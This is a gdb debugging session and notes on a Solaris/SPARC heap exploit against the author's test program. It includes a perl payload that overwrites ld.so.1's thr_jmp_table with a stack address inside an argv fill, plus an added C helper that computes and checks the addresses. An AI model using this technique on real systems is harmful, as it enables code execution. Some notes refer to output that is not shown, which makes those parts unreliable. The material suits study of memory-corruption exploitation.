Breakpoint 1, main (argc=2, argv=0xffafadb4) at e.c:10
10 int n = 5;
(gdb) x/x ___Argv
0x0: Cannot access memory at address 0x0
(gdb) x/96x 0xffbeff00
0xffbeff00: 0x20313932 0x2e313638 0x2e313035 0x2e383220
0xffbeff10: 0x3232004d 0x4f44554c 0x4553484f 0x4d453d2f
0xffbeff20: 0x746f6f6c 0x732f6d6f 0x64756c65 0x732d322e
0xffbeff30: 0x32623100 0x53415043 0x5f535243 0x3d2f6772
0xffbeff40: 0x6f757073 0x2f756c61 0x622f6465 0x76686f73
0xffbeff50: 0x74004343 0x3d676363 0x0078756c 0x69627372
0xffbeff60: 0x633d2f73 0x6f757263 0x65732f78 0x696e752d
0xffbeff70: 0x70656e74 0x69756d2f 0x7372632f 0x6c69622f
0xffbeff80: 0x6c696278 0x63007063 0x65783d2f 0x67726f75
0xffbeff90: 0x70732f75 0x6c61622f 0x70636465 0x762f6578
0xffbeffa0: 0x616d706c 0x65730053 0x4150435f 0x474e5542
0xffbeffb0: 0x494e3d2f 0x67726f75 0x70732f75 0x6c61622f
0xffbeffc0: 0x62696e00 0x53554e57 0x2c53756e 0x2d426c61
0xffbeffd0: 0x64652d31 0x3030002f 0x686f6d65 0x2f62617a
0xffbeffe0: 0x7a2f6d79 0x5f6f776e 0x5f686561 0x705f6578
0xffbefff0: 0x706c6f69 0x742f6500 0x00000000 0x00000000
0xffbf0000: Cannot access memory at address 0xffbf0000
(gdb)
0xffbf0004: Cannot access memory at address 0xffbf0004
(gdb)
0xffbf0008: Cannot access memory at address 0xffbf0008
(gdb) x/96x 0xffbee000
0xffbee000: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee010: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee020: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee030: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee040: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee050: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee060: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee070: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee080: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee090: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee0a0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee0b0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee0c0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee0d0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee0e0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee0f0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee100: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee110: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee120: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee130: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee140: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee150: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee160: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee170: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb)
0xffbee180: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee190: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee1a0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee1b0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee1c0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee1d0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee1e0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee1f0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee200: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee210: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee220: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee230: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee240: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee250: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee260: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee270: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee280: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee290: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee2a0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee2b0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee2c0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee2d0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee2e0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee2f0: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb)
0xffbee300: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee310: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee320: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee330: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee340: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee350: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee360: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee370: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee380: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee390: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee3a0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee3b0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee3c0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee3d0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee3e0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee3f0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee400: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee410: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee420: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee430: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee440: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee450: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee460: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee470: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb)
0xffbee480: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee490: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee4a0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee4b0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee4c0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee4d0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee4e0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee4f0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee500: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee510: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee520: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee530: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee540: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee550: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee560: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee570: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee580: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee590: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee5a0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee5b0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee5c0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee5d0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee5e0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee5f0: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb)
0xffbee600: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee610: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee620: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee630: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee640: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee650: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee660: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee670: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee680: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee690: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee6a0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee6b0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee6c0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee6d0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee6e0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee6f0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee700: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee710: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee720: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee730: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee740: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee750: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee760: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee770: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb)
0xffbee780: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee790: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee7a0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee7b0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee7c0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee7d0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee7e0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee7f0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee800: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee810: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee820: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee830: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee840: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee850: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee860: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee870: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee880: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee890: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee8a0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee8b0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee8c0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee8d0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee8e0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee8f0: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb)
0xffbee900: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee910: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee920: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee930: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee940: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee950: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee960: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee970: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee980: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee990: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee9a0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee9b0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee9c0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee9d0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee9e0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee9f0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeea00: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeea10: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeea20: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeea30: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeea40: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeea50: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeea60: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeea70: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb)
0xffbeea80: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeea90: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeaa0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeab0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeac0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeead0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeae0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeaf0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeb00: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeb10: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeb20: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeb30: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeb40: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeb50: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeb60: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeb70: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeb80: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeb90: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeba0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeebb0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeebc0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeebd0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeebe0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeebf0: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb)
0xffbeec00: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeec10: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeec20: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeec30: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeec40: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeec50: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeec60: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeec70: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeec80: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeec90: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeca0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeecb0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeecc0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeecd0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeece0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeecf0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeed00: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeed10: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeed20: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeed30: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeed40: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeed50: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeed60: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeed70: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb)
0xffbeed80: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeed90: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeda0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeedb0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeedc0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeedd0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeede0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeedf0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeee00: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeee10: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeee20: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeee30: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeee40: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeee50: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeee60: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeee70: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeee80: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeee90: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeea0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeeb0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeec0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeed0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeee0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeef0: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb)
0xffbeef00: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeef10: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeef20: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeef30: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeef40: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeef50: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeef60: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeef70: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeef80: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeef90: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeefa0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeefb0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeefc0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeefd0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeefe0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeff0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef000: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef010: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef020: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef030: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef040: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef050: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef060: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef070: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb)
0xffbef080: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef090: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef0a0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef0b0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef0c0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef0d0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef0e0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef0f0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef100: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef110: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef120: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef130: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef140: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef150: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef160: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef170: 0x41007063 0x6c69623d 0x2f67726f 0x7570732f
0xffbef180: 0x756c6162 0x2f706364 0x65762f6c 0x6962004d
0xffbef190: 0x414e5041 0x54483d2f 0x686f6d65 0x2f62617a
0xffbef1a0: 0x7a2f746f 0x6f6c732f 0x73686172 0x652f6d61
0xffbef1b0: 0x6e3a2f68 0x6f6d652f 0x62617a7a 0x2f6e6f62
0xffbef1c0: 0x61636b75 0x702f696e 0x7374616c 0x6c2f7368
0xffbef1d0: 0x6172652f 0x6d616e3a 0x2f757372 0x2f736861
0xffbef1e0: 0x72652f6d 0x616e004e 0x4e545053 0x45525645
0xffbef1f0: 0x523d6e65 0x77732e63 0x732e756d 0x622e6564
(gdb)
0xffbef200: 0x75007063 0x6c696273 0x72633d2f 0x67726f75
0xffbef210: 0x70732f75 0x6c61622f 0x64657668 0x6f73742f
0xffbef220: 0x6c696263 0x00484f53 0x543d626c 0x61646537
0xffbef230: 0x32005445 0x524d3d78 0x7465726d 0x00534845
0xffbef240: 0x4c4c3d2f 0x686f6d65 0x2f62617a 0x7a2f746f
0xffbef250: 0x6f6c732f 0x62696e2f 0x62617368 0x00535348
0xffbef260: 0x5f434c49 0x454e543d 0x3139322e 0x3136382e
0xffbef270: 0x3130362e 0x32333720 0x34313339 0x32203232
0xffbef280: 0x0078756c 0x69623d2f 0x736f7572 0x6365732f
0xffbef290: 0x78696e75 0x2d70656e 0x7469756d 0x2f6c6962
0xffbef2a0: 0x0046434f 0x4445533d 0x2f657463 0x2f66696e
0xffbef2b0: 0x642e636f 0x64657300 0x5353485f 0x5454593d
0xffbef2c0: 0x2f646576 0x2f707473 0x2f330078 0x75696e63
0xffbef2d0: 0x3d2f736f 0x75726365 0x732f7869 0x6e752d70
0xffbef2e0: 0x656e7469 0x756d2f69 0x6e636c75 0x64650047
0xffbef2f0: 0x524f5550 0x3d756772 0x61640055 0x5345523d
0xffbef300: 0x62617a7a 0x004c535f 0x434f4c4f 0x52533d66
0xffbef310: 0x693d303b 0x33373a72 0x733d303a 0x64693d30
0xffbef320: 0x313b3338 0x3a6c6e3d 0x30313b33 0x363a6d68
0xffbef330: 0x3d30303a 0x70693d34 0x303b3333 0x3a736f3d
0xffbef340: 0x30313b33 0x353a646f 0x3d30313b 0x33353a62
0xffbef350: 0x643d3430 0x3b33333b 0x30313a63 0x643d3430
0xffbef360: 0x3b33333b 0x30313a6f 0x723d3430 0x3b33313b
0xffbef370: 0x30313a73 0x753d3337 0x3b34313a 0x73673d33
(gdb) info proc map
process 28421 flags:
PR_STOPPED Process (LWP) is stopped
PR_ISTOP Stopped on an event of interest
PR_RLC Run-on-last-close is in effect
PR_FAULTED : Incurred a traced hardware fault FLTBPT: Breakpoint trap
Mapped address spaces:
Start Addr End Addr Size Offset Flags
0x10000 0x11fff 0x2000 0 ----r-x
0x20000 0x21fff 0x2000 0 ----rwx
0xff280000 0xff32bfff 0xac000 0 ----r-x
0xff33c000 0xff343fff 0x8000 0xac000 ----rwx
0xff370000 0xff371fff 0x2000 0 ----rwx
0xff380000 0xff383fff 0x4000 0 ----r-x
0xff390000 0xff391fff 0x2000 0 ----rwx
0xff3b0000 0xff3dffff 0x30000 0 ----r-x
0xff3e0000 0xff3e1fff 0x2000 0x30000 ----rwx
0xff3e2000 0xff3e3fff 0x2000 0 ----rwx
0xffaf8000 0xffbeffff 0xf8000 0xffffe000 -s--rwx
(gdb)
Make a TRULY LARGE argv[1].. I just tried 1 million and it worked just fine… The stack is forced to grow phenomenally downwards: the stack mapping is now 0xffaf8000-0xffbeffff (0xf8000 bytes) instead of the 0xffbee000-0xffbeffff of the earlier map, and everything from 0xffbee000 up to the environment strings at 0xffbef170 is solid 0x41414141. That gives me a safe "zone": a pointer such as 0xffbeef08 lands inside the 'A' fill even if the exact layout shifts a little, so that is the value I write to the LD offset. Here is blade72's offset:
r `perl -e 'print "A"x0x2f0 . "\xff\xff\xff\xf8" . "AAAA" . "\xff\x3e\x02\x14" . "AAAA" . "\xff\xff\xff\xff" . "AAAA" . "AAAA" . "AAAA" . "\xff\xbe\xef\x08" . "AAAA" . "AAAA" . "AAAA" . "\xff\xff\xff\xc8"'`
^^^^ 0xff3e0234 is the thr_jmp_table address for blade72. The address field of the payload, which held 0xffbeeca4 when it hit n, now holds 0xff3e0214, 0x20 below that symbol; the value field is still the stack pointer 0xffbeef08.
bazz@blade72[pts/3][~/my_own_heap_exploit] nm /usr/lib/ld.so.1 | grep thr_jmp_table
00030234 d thr_jmp_table
Add that file offset to the de-facto ld.so.1 load address, 0xff3b0000 (the ld.so.1 text mapping in the map above): 0xff3b0000 + 0x30234 = 0xff3e0234, which falls inside the 0xff3e0000-0xff3e1fff rwx mapping, ld.so.1's writable data segment.
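As an added example (my code, not the post's), here is the same address bookkeeping in C so that each step can be checked rather than done by eye: rebase thr_jmp_table from its `nm` file offset onto the ld.so.1 load address, verify that the write target and the PLT slot reached from malloc+24 ("what I can overwrite" above) both sit in writable mappings, verify that the value being written, 0xffbeef08, lands in the stack fill created by the large argv[1], and emit the big-endian bytes that the perl one-liner spells out as "\xff\x3e\x02\x14". The mapping table and the nm line are copied from the output on this page; the function names (`find_mapping`, `writable_word`, `in_stack`, `rebase_symbol`, `be32`) and the `LD_SO_BASE` constant are my own.

```c
/*
 * Added example, not code from the original post: address bookkeeping for
 * the thr_jmp_table overwrite, using the process map shown on the page.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

struct mapping {
    uint32_t    start, end;   /* inclusive, as `info proc map` prints them */
    const char *flags;
};

/* Constructed from the second `info proc map` on the page (after the 1M argv). */
static const struct mapping proc_map[] = {
    { 0x00010000u, 0x00011fffu, "----r-x" },  /* e: text              */
    { 0x00020000u, 0x00021fffu, "----rwx" },  /* e: data + heap       */
    { 0xff280000u, 0xff32bfffu, "----r-x" },  /* libc text            */
    { 0xff33c000u, 0xff343fffu, "----rwx" },  /* libc data, incl. PLT */
    { 0xff370000u, 0xff371fffu, "----rwx" },
    { 0xff380000u, 0xff383fffu, "----r-x" },
    { 0xff390000u, 0xff391fffu, "----rwx" },
    { 0xff3b0000u, 0xff3dffffu, "----r-x" },  /* ld.so.1 text         */
    { 0xff3e0000u, 0xff3e1fffu, "----rwx" },  /* ld.so.1 data         */
    { 0xff3e2000u, 0xff3e3fffu, "----rwx" },
    { 0xffaf8000u, 0xffbeffffu, "-s--rwx" },  /* stack after 1M argv  */
};
#define NMAP (sizeof proc_map / sizeof proc_map[0])

#define LD_SO_BASE 0xff3b0000u   /* "de-facto LD location" on blade72 (assumed from the map) */

/* Return the mapping containing addr, or NULL if addr is unmapped. */
const struct mapping *find_mapping(uint32_t addr)
{
    for (size_t i = 0; i < NMAP; i++)
        if (addr >= proc_map[i].start && addr <= proc_map[i].end)
            return &proc_map[i];
    return NULL;
}

/* 1 if all four bytes of a word write at addr fall into writable mappings. */
int writable_word(uint32_t addr)
{
    for (uint32_t i = 0; i < 4; i++) {
        const struct mapping *m = find_mapping(addr + i);
        if (m == NULL || strchr(m->flags, 'w') == NULL)
            return 0;
    }
    return 1;
}

/* 1 if addr lies in the stack mapping (the 's' flag in `info proc map`). */
int in_stack(uint32_t addr)
{
    const struct mapping *m = find_mapping(addr);
    return m != NULL && strchr(m->flags, 's') != NULL;
}

/*
 * Parse one `nm` line ("00030234 d thr_jmp_table"); if it names `want`,
 * store base + offset in *out.  Returns 1 on success, 0 otherwise.
 */
int rebase_symbol(const char *nm_line, uint32_t base, const char *want, uint32_t *out)
{
    unsigned long off;
    char type, name[64];

    if (sscanf(nm_line, "%lx %c %63s", &off, &type, name) != 3)
        return 0;
    if (strcmp(name, want) != 0)
        return 0;
    *out = base + (uint32_t)off;
    return 1;
}

/* Big-endian encoding: SPARC byte order, i.e. the order the perl "\xff\x3e..." literals use. */
void be32(uint32_t v, unsigned char out[4])
{
    out[0] = (unsigned char)(v >> 24);
    out[1] = (unsigned char)(v >> 16);
    out[2] = (unsigned char)(v >> 8);
    out[3] = (unsigned char)(v);
}

int main(void)
{
    uint32_t target;
    unsigned char enc[4];
    const char *nm_line = "00030234 d thr_jmp_table";   /* copied from the page */

    if (!rebase_symbol(nm_line, LD_SO_BASE, "thr_jmp_table", &target)) {
        fprintf(stderr, "symbol not found\n");
        return 1;
    }
    be32(target, enc);
    printf("thr_jmp_table = 0x%08x  writable=%d  bytes=\\x%02x\\x%02x\\x%02x\\x%02x\n",
           target, writable_word(target), enc[0], enc[1], enc[2], enc[3]);
    printf("0xffbeef08 inside the stack fill: %d\n", in_stack(0xffbeef08u));
    printf("PLT slot called from malloc+24 (0xff33d044) writable: %d\n",
           writable_word(0xff33d044u));
    return 0;
}
```

The mapping check is the step worth automating: an `nm` offset rebased onto the wrong object, or onto a text segment, gives an address that reads fine in gdb but faults on the write, which is indistinguishable from a bad payload layout unless the target's permissions are checked first.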